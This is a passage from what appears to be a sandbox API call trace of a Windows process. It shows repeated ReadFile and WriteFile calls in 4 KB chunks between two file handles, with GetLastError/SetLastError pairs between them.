lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.592] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.592] GetLastError () returned 0x0 [0101.592] SetLastError (dwErrCode=0x0) [0101.593] GetLastError () returned 0x0 [0101.593] SetLastError (dwErrCode=0x0) [0101.593] GetLastError () returned 0x0 [0101.593] SetLastError (dwErrCode=0x0) [0101.593] GetLastError () returned 0x0 [0101.593] SetLastError (dwErrCode=0x0) [0101.593] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.593] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.593] GetLastError () returned 0x0 [0101.593] SetLastError (dwErrCode=0x0) [0101.594] GetLastError () returned 0x0 [0101.594] SetLastError (dwErrCode=0x0) [0101.594] GetLastError () returned 0x0 [0101.594] SetLastError (dwErrCode=0x0) [0101.594] GetLastError () returned 0x0 [0101.594] SetLastError (dwErrCode=0x0) [0101.594] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.594] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.594] GetLastError () returned 0x0 [0101.594] SetLastError (dwErrCode=0x0) [0101.594] GetLastError () returned 0x0 [0101.594] SetLastError (dwErrCode=0x0) [0101.595] GetLastError () returned 0x0 [0101.595] SetLastError (dwErrCode=0x0) [0101.595] GetLastError () returned 0x0 [0101.595] SetLastError (dwErrCode=0x0) [0101.595] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.595] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.595] GetLastError () returned 0x0 [0101.595] SetLastError (dwErrCode=0x0) [0101.595] GetLastError () returned 0x0 [0101.595] SetLastError (dwErrCode=0x0) [0101.595] GetLastError () returned 0x0 [0101.595] SetLastError (dwErrCode=0x0) [0101.596] GetLastError () returned 0x0 [0101.596] SetLastError (dwErrCode=0x0) [0101.596] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.596] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.596] GetLastError () returned 0x0 [0101.596] SetLastError (dwErrCode=0x0) [0101.596] GetLastError () returned 0x0 [0101.596] SetLastError (dwErrCode=0x0) [0101.596] GetLastError () returned 0x0 [0101.596] SetLastError (dwErrCode=0x0) [0101.597] GetLastError () returned 0x0 [0101.597] SetLastError (dwErrCode=0x0) [0101.597] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.597] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.597] GetLastError () returned 0x0 [0101.597] SetLastError (dwErrCode=0x0) [0101.597] GetLastError () returned 0x0 [0101.597] SetLastError (dwErrCode=0x0) [0101.597] GetLastError () returned 0x0 [0101.597] SetLastError (dwErrCode=0x0) [0101.597] GetLastError () returned 0x0 [0101.597] SetLastError (dwErrCode=0x0) [0101.598] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.598] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.600] GetLastError () returned 0x0 [0101.600] SetLastError (dwErrCode=0x0) [0101.600] GetLastError () returned 0x0 [0101.600] SetLastError (dwErrCode=0x0) [0101.600] GetLastError () returned 0x0 [0101.600] SetLastError (dwErrCode=0x0) [0101.600] GetLastError () returned 0x0 [0101.600] SetLastError (dwErrCode=0x0) [0101.600] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.600] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.601] GetLastError () returned 0x0 [0101.601] SetLastError (dwErrCode=0x0) [0101.601] GetLastError () returned 0x0 [0101.601] SetLastError (dwErrCode=0x0) [0101.601] GetLastError () returned 0x0 [0101.601] SetLastError (dwErrCode=0x0) [0101.601] GetLastError () returned 0x0 [0101.601] SetLastError (dwErrCode=0x0) [0101.601] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.601] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.602] GetLastError () returned 0x0 [0101.602] SetLastError (dwErrCode=0x0) [0101.602] GetLastError () returned 0x0 [0101.602] SetLastError (dwErrCode=0x0) [0101.602] GetLastError () returned 0x0 [0101.602] SetLastError (dwErrCode=0x0) [0101.602] GetLastError () returned 0x0 [0101.602] SetLastError (dwErrCode=0x0) [0101.602] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.602] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.603] GetLastError () returned 0x0 [0101.603] SetLastError (dwErrCode=0x0) [0101.603] GetLastError () returned 0x0 [0101.603] SetLastError (dwErrCode=0x0) [0101.603] GetLastError () returned 0x0 [0101.603] SetLastError (dwErrCode=0x0) [0101.603] GetLastError () returned 0x0 [0101.603] SetLastError (dwErrCode=0x0) [0101.603] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.603] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.603] GetLastError () returned 0x0 [0101.604] SetLastError (dwErrCode=0x0) [0101.604] GetLastError () returned 0x0 [0101.604] SetLastError (dwErrCode=0x0) [0101.604] GetLastError () returned 0x0 [0101.604] SetLastError (dwErrCode=0x0) [0101.604] GetLastError () returned 0x0 [0101.604] SetLastError (dwErrCode=0x0) [0101.604] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.604] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.604] GetLastError () returned 0x0 [0101.604] SetLastError (dwErrCode=0x0) [0101.605] GetLastError () returned 0x0 [0101.605] SetLastError (dwErrCode=0x0) [0101.605] GetLastError () returned 0x0 [0101.605] SetLastError (dwErrCode=0x0) [0101.605] GetLastError () returned 0x0 [0101.605] SetLastError (dwErrCode=0x0) [0101.605] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.605] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.605] GetLastError () returned 0x0 [0101.605] SetLastError (dwErrCode=0x0) [0101.605] GetLastError () returned 0x0 [0101.606] SetLastError (dwErrCode=0x0) [0101.606] GetLastError () returned 0x0 [0101.606] SetLastError (dwErrCode=0x0) [0101.606] GetLastError () returned 0x0 [0101.606] SetLastError (dwErrCode=0x0) [0101.606] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.606] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.606] GetLastError () returned 0x0 [0101.606] SetLastError (dwErrCode=0x0) [0101.606] GetLastError () returned 0x0 [0101.606] SetLastError (dwErrCode=0x0) [0101.607] GetLastError () returned 0x0 [0101.607] SetLastError (dwErrCode=0x0) [0101.607] GetLastError () returned 0x0 [0101.607] SetLastError (dwErrCode=0x0) [0101.607] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.607] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.607] GetLastError () returned 0x0 [0101.607] SetLastError (dwErrCode=0x0) [0101.607] GetLastError () returned 0x0 [0101.607] SetLastError (dwErrCode=0x0) [0101.607] GetLastError () returned 0x0 [0101.608] SetLastError (dwErrCode=0x0) [0101.608] GetLastError () returned 0x0 [0101.608] SetLastError (dwErrCode=0x0) [0101.608] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.608] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.608] GetLastError () returned 0x0 [0101.608] SetLastError (dwErrCode=0x0) [0101.608] GetLastError () returned 0x0 [0101.608] SetLastError (dwErrCode=0x0) [0101.608] GetLastError () returned 0x0 [0101.608] SetLastError (dwErrCode=0x0) [0101.609] GetLastError () returned 0x0 [0101.609] SetLastError (dwErrCode=0x0) [0101.609] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.609] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.609] GetLastError () returned 0x0 [0101.609] SetLastError (dwErrCode=0x0) [0101.609] GetLastError () returned 0x0 [0101.609] SetLastError (dwErrCode=0x0) [0101.609] GetLastError () returned 0x0 [0101.609] SetLastError (dwErrCode=0x0) [0101.609] GetLastError () returned 0x0 [0101.610] SetLastError (dwErrCode=0x0) [0101.610] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.610] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.610] GetLastError () returned 0x0 [0101.610] SetLastError (dwErrCode=0x0) [0101.610] GetLastError () returned 0x0 [0101.610] SetLastError (dwErrCode=0x0) [0101.610] GetLastError () returned 0x0 [0101.610] SetLastError (dwErrCode=0x0) [0101.610] GetLastError () returned 0x0 [0101.610] SetLastError (dwErrCode=0x0) [0101.610] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.610] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.611] GetLastError () returned 0x0 [0101.611] SetLastError (dwErrCode=0x0) [0101.611] GetLastError () returned 0x0 [0101.611] SetLastError (dwErrCode=0x0) [0101.611] GetLastError () returned 0x0 [0101.611] SetLastError (dwErrCode=0x0) [0101.611] GetLastError () returned 0x0 [0101.611] SetLastError (dwErrCode=0x0) [0101.611] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.611] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.611] GetLastError () returned 0x0 [0101.611] SetLastError (dwErrCode=0x0) [0101.611] GetLastError () returned 0x0 [0101.611] SetLastError (dwErrCode=0x0) [0101.611] GetLastError () returned 0x0 [0101.611] SetLastError (dwErrCode=0x0) [0101.612] GetLastError () returned 0x0 [0101.612] SetLastError (dwErrCode=0x0) [0101.612] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.612] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.612] GetLastError () returned 0x0 [0101.612] SetLastError (dwErrCode=0x0) [0101.612] GetLastError () returned 0x0 [0101.612] SetLastError (dwErrCode=0x0) [0101.612] GetLastError () returned 0x0 [0101.612] SetLastError (dwErrCode=0x0) [0101.612] GetLastError () returned 0x0 [0101.612] SetLastError (dwErrCode=0x0) [0101.612] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.613] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.613] GetLastError () returned 0x0 [0101.613] SetLastError (dwErrCode=0x0) [0101.613] GetLastError () returned 0x0 [0101.613] SetLastError (dwErrCode=0x0) [0101.613] GetLastError () returned 0x0 [0101.613] SetLastError (dwErrCode=0x0) [0101.613] GetLastError () returned 0x0 [0101.613] SetLastError (dwErrCode=0x0) [0101.613] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.613] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.613] GetLastError () returned 0x0 [0101.613] SetLastError (dwErrCode=0x0) [0101.613] GetLastError () returned 0x0 [0101.613] SetLastError (dwErrCode=0x0) [0101.613] GetLastError () returned 0x0 [0101.613] SetLastError (dwErrCode=0x0) [0101.614] GetLastError () returned 0x0 [0101.614] SetLastError (dwErrCode=0x0) [0101.614] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.614] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.614] GetLastError () returned 0x0 [0101.614] SetLastError (dwErrCode=0x0) [0101.614] GetLastError () returned 0x0 [0101.614] SetLastError (dwErrCode=0x0) [0101.614] GetLastError () returned 0x0 [0101.614] SetLastError (dwErrCode=0x0) [0101.614] GetLastError () returned 0x0 [0101.614] SetLastError (dwErrCode=0x0) [0101.614] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.614] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.614] GetLastError () returned 0x0 [0101.614] SetLastError (dwErrCode=0x0) [0101.615] GetLastError () returned 0x0 [0101.615] SetLastError (dwErrCode=0x0) [0101.615] GetLastError () returned 0x0 [0101.615] SetLastError (dwErrCode=0x0) [0101.615] GetLastError () returned 0x0 [0101.615] SetLastError (dwErrCode=0x0) [0101.615] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.615] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.615] GetLastError () returned 0x0 [0101.615] SetLastError (dwErrCode=0x0) [0101.615] GetLastError () returned 0x0 [0101.615] SetLastError (dwErrCode=0x0) [0101.615] GetLastError () returned 0x0 [0101.615] SetLastError (dwErrCode=0x0) [0101.615] GetLastError () returned 0x0 [0101.615] SetLastError (dwErrCode=0x0) [0101.615] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.615] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.616] GetLastError () returned 0x0 [0101.616] SetLastError (dwErrCode=0x0) [0101.616] GetLastError () returned 0x0 [0101.616] SetLastError (dwErrCode=0x0) [0101.616] GetLastError () returned 0x0 [0101.616] SetLastError (dwErrCode=0x0) [0101.616] GetLastError () returned 0x0 [0101.616] SetLastError (dwErrCode=0x0) [0101.616] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.616] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.616] GetLastError () returned 0x0 [0101.616] SetLastError (dwErrCode=0x0) [0101.616] GetLastError () returned 0x0 [0101.616] SetLastError (dwErrCode=0x0) [0101.616] GetLastError () returned 0x0 [0101.617] SetLastError (dwErrCode=0x0) [0101.617] GetLastError () returned 0x0 [0101.617] SetLastError (dwErrCode=0x0) [0101.617] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.617] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.617] GetLastError () returned 0x0 [0101.617] SetLastError (dwErrCode=0x0) [0101.617] GetLastError () returned 0x0 [0101.617] SetLastError (dwErrCode=0x0) [0101.617] GetLastError () returned 0x0 [0101.617] SetLastError (dwErrCode=0x0) [0101.617] GetLastError () returned 0x0 [0101.617] SetLastError (dwErrCode=0x0) [0101.617] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.617] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.617] GetLastError () returned 0x0 [0101.618] SetLastError (dwErrCode=0x0) [0101.618] GetLastError () returned 0x0 [0101.618] SetLastError (dwErrCode=0x0) [0101.618] GetLastError () returned 0x0 [0101.618] SetLastError (dwErrCode=0x0) [0101.618] GetLastError () returned 0x0 [0101.618] SetLastError (dwErrCode=0x0) [0101.618] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.618] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.618] GetLastError () returned 0x0 [0101.618] SetLastError (dwErrCode=0x0) [0101.618] GetLastError () returned 0x0 [0101.618] SetLastError (dwErrCode=0x0) [0101.618] GetLastError () returned 0x0 [0101.618] SetLastError (dwErrCode=0x0) [0101.618] GetLastError () returned 0x0 [0101.618] SetLastError (dwErrCode=0x0) [0101.618] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0101.618] WriteFile (in: hFile=0x27c, lpBuffer=0x996d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x996d8*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0101.619] GetLastError () returned 0x0 [0101.619] SetLastError (dwErrCode=0x0) [0101.619] GetLastError () returned 0x0 [0101.619] SetLastError (dwErrCode=0x0) [0101.619] GetLastError () returned 0x0 [0101.619] SetLastError (dwErrCode=0x0) [0101.619] GetLastError () returned 0x0 [0101.619] SetLastError (dwErrCode=0x0) [0101.619] ReadFile (in: hFile=0x368, lpBuffer=0x986d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x986d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, 